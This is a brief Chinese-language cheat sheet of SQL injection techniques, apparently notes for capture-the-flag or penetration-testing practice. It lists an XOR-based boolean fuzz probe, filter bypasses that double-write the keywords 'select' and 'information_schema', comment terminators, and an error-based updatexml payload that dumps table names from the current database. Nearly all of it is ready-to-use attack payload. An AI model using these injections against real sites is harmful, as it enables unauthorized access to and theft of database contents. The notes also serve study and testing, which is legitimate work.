fuzz
'^(length("select")!=0)--+ 双真或者双假为假
绕过检测方法:双写
seleselectct
注释方法
‘ xxxx #
’ xxxx--+
or绕过
infoorrmation_schema
updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) %23